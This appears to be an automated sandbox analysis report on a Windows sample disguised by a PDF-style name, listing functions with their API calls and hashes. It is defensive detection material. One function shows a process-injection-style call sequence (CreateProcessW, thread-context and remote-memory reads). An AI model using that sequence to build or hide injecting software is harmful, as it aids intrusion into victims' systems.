                                      • Opcode Fuzzy Hash: 594f6e6ae480bfa0264789d13bf927a2107544a31228aa9261d6ca896fde7626
                                      • Instruction Fuzzy Hash: B9515D71D14249EFEF15DBE4D814BEEBB79AF48300F004199A609BB2C0D7B91B84DBA5
                                      Function 00375B20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50libraryfileloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1406 375b20-375b2e call 367f0c 1409 375b52 1406->1409 1410 375b30-375b4b GetModuleHandleW GetProcAddress 1406->1410 1411 375b55-375b5f call 367f0c 1409->1411 1410->1411 1412 375b4d-375b50 1410->1412 1416 375b93-375ba8 CreateFileW 1411->1416 1417 375b61-375b91 1411->1417 1413 375bae-375bb0 1412->1413 1416->1413 1417->1413
                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32.dll,CreateFile2,00000001,0000000C,00000001,?,00000001,?,00000000,00000109), ref: 00375B3A
                                      • GetProcAddress.KERNEL32(00000000), ref: 00375B41
                                      • CreateFileW.KERNELBASE(00000000,?,00000001,?,00000001,00000001,00000000,00000001,0000000C,00000001,?,00000001,?,00000000,00000109), ref: 00375BA8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressCreateFileHandleModuleProc
                                      • String ID: CreateFile2$kernel32.dll
                                      • API String ID: 2580138172-1988006178
                                      • Opcode ID: 9e6f349b6bd94d7a64c739f271599f7157a2b3a9d5a7bd1a231e083a53b442cb
                                      • Instruction ID: c48538faf0116b8fc35ce79dd4dd88af40a5f85d8662159a7c0b0c755a3dce3c
                                      • Opcode Fuzzy Hash: 9e6f349b6bd94d7a64c739f271599f7157a2b3a9d5a7bd1a231e083a53b442cb
                                      • Instruction Fuzzy Hash: 2E111572800609AFCF129FA4CC05EEE7BB8FF08315F018125FD14A6291C7B5DA209BA0
                                      Function 0035D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1419 35d298-35d2a3 1420 35d315-35d317 1419->1420 1421 35d2a5-35d2aa 1419->1421 1423 35d308-35d30b 1420->1423 1421->1420 1422 35d2ac-35d2c4 RegOpenKeyExW 1421->1422 1422->1420 1424 35d2c6-35d2e5 RegQueryValueExW 1422->1424 1425 35d2e7-35d2f2 1424->1425 1426 35d2fc-35d307 RegCloseKey 1424->1426 1427 35d2f4-35d2f6 1425->1427 1428 35d30c-35d313 1425->1428 1426->1423 1429 35d2fa 1427->1429 1428->1429 1429->1426
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0035D28B,SwapMouseButtons,00000004,?), ref: 0035D2BC
                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0035D28B,SwapMouseButtons,00000004,?,?,?,?,0035C865), ref: 0035D2DD
                                      • RegCloseKey.KERNELBASE(00000000,?,?,0035D28B,SwapMouseButtons,00000004,?,?,?,?,0035C865), ref: 0035D2FF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: Control Panel\Mouse
                                      • API String ID: 3677997916-824357125
                                      • Opcode ID: ba6e5d4a136d9b8687ea29f43678c03c5c36aee03cc4c78f65bd600d5eca40e9
                                      • Instruction ID: 2ee3512c4fb750e0c9108746c56847c638bb119390db28d8d5db5799f1802c5c
                                      • Opcode Fuzzy Hash: ba6e5d4a136d9b8687ea29f43678c03c5c36aee03cc4c78f65bd600d5eca40e9
                                      • Instruction Fuzzy Hash: 29117979611219BFDB228FA8DC84EAF7BBCEF04741F004829F805D7120E731AE489B60
                                      Function 020E12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 020E1A5B
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 020E1AF1
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 020E1B13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6130076775.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20e0000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                      • Instruction ID: 7a317663eab1f08c02530529501710987538e88bdc731a6cb0d1a1f47858152c
                                      • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                      • Instruction Fuzzy Hash: 1F620B30A14258DBEB24DFA4C850BEEB376EF58304F1091A9D10DEB390E7B59E81DB59
                                      Function 003451AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00345293
                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003B3CB0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: IconLoadNotifyShell_String
                                      • String ID: Line:
                                      • API String ID: 3363329723-1585850449
                                      • Opcode ID: 8df8fae9919ea6e8b2b94db8f139fe9f7c94e719babaf1c2673307f1c54009c2
                                      • Instruction ID: 4ce7a2ffc5b10728cf9f00f109d9a9511545c1d086971db48a7ec0670739cd50
                                      • Opcode Fuzzy Hash: 8df8fae9919ea6e8b2b94db8f139fe9f7c94e719babaf1c2673307f1c54009c2
                                      • Instruction Fuzzy Hash: 7F31A1718087446FD726EB60DC42FDE77DCAB45310F00492EF5859E4A2EB74B648CB96
                                      Function 003440E5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetOpenFileNameW.COMDLG32 ref: 003B376F
                                        • Part of subcall function 0034660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003453B1,?,?,003461FF,?,00000000,00000001,00000000), ref: 0034662F
                                        • Part of subcall function 003440A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003440C6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Name$Path$FileFullLongOpen
                                      • String ID: X$t3?
                                      • API String ID: 779396738-4041524223
                                      • Opcode ID: ad7d4cf360d84ef97ec4d2d0dfab70388fe4c85106e1112613bf26b2f7e874bb
                                      • Instruction ID: 971075d06acaf7fd3536dbcb2df73869b777bf38af95bcb0f1022e3102a71a6a
                                      • Opcode Fuzzy Hash: ad7d4cf360d84ef97ec4d2d0dfab70388fe4c85106e1112613bf26b2f7e874bb
                                      • Instruction Fuzzy Hash: 142169719101989BDB03DF94D8457EE77F99F49304F004069E505AF241DBB466898F55
                                      Function 0038C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTempPathW.KERNEL32(00000104,?), ref: 0038C72F
                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0038C746
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Temp$FileNamePath
                                      • String ID: aut
                                      • API String ID: 3285503233-3010740371
                                      • Opcode ID: 9fd211739ccf890eff1d87fdc4e7d462b4dbb15ba63fc78e57e47d4af462a3f4
                                      • Instruction ID: 3b3475a50070049f25676c854ee988d28d726909ee2bb0c94c65df92f8999031
                                      • Opcode Fuzzy Hash: 9fd211739ccf890eff1d87fdc4e7d462b4dbb15ba63fc78e57e47d4af462a3f4
                                      • Instruction Fuzzy Hash: 54D05E7150030EABDB11AB90DC0EFDAB76C9700704F0005A0B750E50B1DBB0E6998B54
                                      Function 0039F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 943955addbbebd53b95bdfea7404ce69eabdb2637f08ab481ba40ae713f8e2d7
                                      • Instruction ID: 62b399aeb6fecf95f0107ebcbceb751ec997694a31534d9c3115669836e480b3
                                      • Opcode Fuzzy Hash: 943955addbbebd53b95bdfea7404ce69eabdb2637f08ab481ba40ae713f8e2d7
                                      • Instruction Fuzzy Hash: 25F159716083019FCB11DF24C885B6AB7E5FF89314F14896EF9959B292DB70E905CB82
                                      Function 0038C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0038C385,?,?,?,?,?,00000004), ref: 0038C6F2
                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0038C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0038C708
                                      • CloseHandle.KERNEL32(00000000,?,0038C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0038C70F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleTime
                                      • String ID:
                                      • API String ID: 3397143404-0
                                      • Opcode ID: ec7727896eaf8f7f6615a0a5ab60311ea783dbd9f388507e25067169f7074e99
                                      • Instruction ID: 44b237fbc18a97c9cdbda25d4e3d5f24d687ff6df216fbf4fac2b0e6a77f7841
                                      • Opcode Fuzzy Hash: ec7727896eaf8f7f6615a0a5ab60311ea783dbd9f388507e25067169f7074e99
                                      • Instruction Fuzzy Hash: F4E08632140214BBD7222B54AC0EFCA7B1CAB45760F144120FB54A90E097B135118798
                                      Function 00342322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 003422A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,003424F1), ref: 00342303
                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003425A1
                                      • CoInitialize.OLE32(00000000), ref: 00342618
                                      • CloseHandle.KERNEL32(00000000), ref: 003B503A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Handle$CloseInitializeMessageRegisterWindow
                                      • String ID:
                                      • API String ID: 3815369404-0
                                      • Opcode ID: e28c2f2c97e8ca8b3bb955d357b825a650d764e687eb05b768247ac801ca5e90
                                      • Instruction ID: 6afaa12977dfd032274a04c6acdb1018f320e2126454851369db03f8b697351a
                                      • Opcode Fuzzy Hash: e28c2f2c97e8ca8b3bb955d357b825a650d764e687eb05b768247ac801ca5e90
                                      • Instruction Fuzzy Hash: F071AEB49013858BD30AEF6AAE90855BBE4FB9934479041BEE50AFB7B2CB745404CF1D
                                      Function 00344FFC Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 003450CB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_
                                      • String ID:
                                      • API String ID: 1144537725-0
                                      • Opcode ID: 479063e9bf2ded4a38775040919a20883133f77ce05cb1ccf8e525e7a731b788
                                      • Instruction ID: 59260fe21fd03ae885b42e440f893e1e971514840fd5df7917118305bca3925b
                                      • Opcode Fuzzy Hash: 479063e9bf2ded4a38775040919a20883133f77ce05cb1ccf8e525e7a731b788
                                      • Instruction Fuzzy Hash: 8931A0B0904700CFC726DF24D841697BBE8FF48308F00092EF69A8A252E7717948CB96
                                      Function 00343A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                      Download Yara Rule
                                      APIs
                                      • IsThemeActive.UXTHEME ref: 00343A73
                                        • Part of subcall function 00343ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00343AF3
                                        • Part of subcall function 00343ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00343B08
                                        • Part of subcall function 00343D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00343AA3,?), ref: 00343D45
                                        • Part of subcall function 00343D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00343AA3,?), ref: 00343D57
                                        • Part of subcall function 00343D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00401148,00401130,?,?,?,?,00343AA3,?), ref: 00343DC8
                                        • Part of subcall function 00343D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00343AA3,?), ref: 00343E48
                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00343AB3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                      • String ID:
                                      • API String ID: 1550534281-0
                                      • Opcode ID: c550c6dda1aac459184dbf5dbaafdacec2606b5fb08a4b81f3ad2db9f928b620
                                      • Instruction ID: 3cacd87a92678e114a1689020a20fe00814a8209c427fb203c6243a7554d3544
                                      • Opcode Fuzzy Hash: c550c6dda1aac459184dbf5dbaafdacec2606b5fb08a4b81f3ad2db9f928b620
                                      • Instruction Fuzzy Hash: 40119D719043419BC302EF29E94591EFBE9EB95710F00892EF9859B2B2DB709544CB96
                                      Function 00361C9D Relevance: 3.0, APIs: 2, Instructions: 21memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,00367A85), ref: 00361CB1
                                      • GetLastError.KERNEL32(00000000,?,00367A85), ref: 00361CC3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 485612231-0
                                      • Opcode ID: 2751e33173021582eb8bfcd205bc0c8e22b57be96327a4a4e3b3651cf7eff2e6
                                      • Instruction ID: c6593057e145ec7e352516467799b17bff5d216ea2cbbd9cb237053902eb07a9
                                      • Opcode Fuzzy Hash: 2751e33173021582eb8bfcd205bc0c8e22b57be96327a4a4e3b3651cf7eff2e6
                                      • Instruction Fuzzy Hash: 45E0C271444704ABDB136FB5FD09B9A3B9DEF00344F148434F508DA074D7359940CB84
                                      Function 0036EA9C Relevance: 2.6, APIs: 2, Instructions: 60COMMON
                                      Download Yara Rule
                                      APIs
                                      • CloseHandle.KERNELBASE(00000000,003EEEF4,00000000,?,00376041,003EEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0036EAEC
                                      • GetLastError.KERNEL32(?,00376041,003EEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0036EAF6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CloseErrorHandleLast
                                      • String ID:
                                      • API String ID: 918212764-0
                                      • Opcode ID: 3d8685fd62bd5e85758eb6e5f2f754eafaa6cbc77a29df7a3e364535d815cd25
                                      • Instruction ID: b79bbe0b6c77423de21efbb4bf6d388d0349747259c70c501b9322b1aba008e0
                                      • Opcode Fuzzy Hash: 3d8685fd62bd5e85758eb6e5f2f754eafaa6cbc77a29df7a3e364535d815cd25
                                      • Instruction Fuzzy Hash: 3C01B13660C12016D3271674A90EF3E3B4D9F81734F2BC619F506AF1CADE74E844C292
                                      Function 020E129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 020E1A5B
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 020E1AF1
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 020E1B13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6130076775.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20e0000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                      • Instruction ID: 94acf7ab51c5fb67a63ea029fd0e58089565ed957671b6a6b603b06d04d5490b
                                      • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                      • Instruction Fuzzy Hash: 6412DD24E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A5E77A4F81CF5A
                                      Function 0034E8A0 Relevance: 1.7, APIs: 1, Instructions: 198windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0034E959
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessagePeek
                                      • String ID:
                                      • API String ID: 2222842502-0
                                      • Opcode ID: 42c876c6c4610fc5b870e7a0101d308e6c8a914c54ae95eb32465eaf565e5167
                                      • Instruction ID: 0178c015eeaf32ded03a2a5228050493e8edb286f60231dc63d03f7c0b3ae78d
                                      • Opcode Fuzzy Hash: 42c876c6c4610fc5b870e7a0101d308e6c8a914c54ae95eb32465eaf565e5167
                                      • Instruction Fuzzy Hash: 0D71E7709043808FEB27CF24C8897AA7BD0FB55308F09497DE9859F6A1D775E885CB92
                                      Function 003B9A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: caa0e8b1249b37d3a9230b38b7099c862c0ac9f721d33d6b7dff09cc215d47ad
                                      • Instruction ID: e192702c67735783678cbbf17ae024b91eddb37d103197d99871131619888f2a
                                      • Opcode Fuzzy Hash: caa0e8b1249b37d3a9230b38b7099c862c0ac9f721d33d6b7dff09cc215d47ad
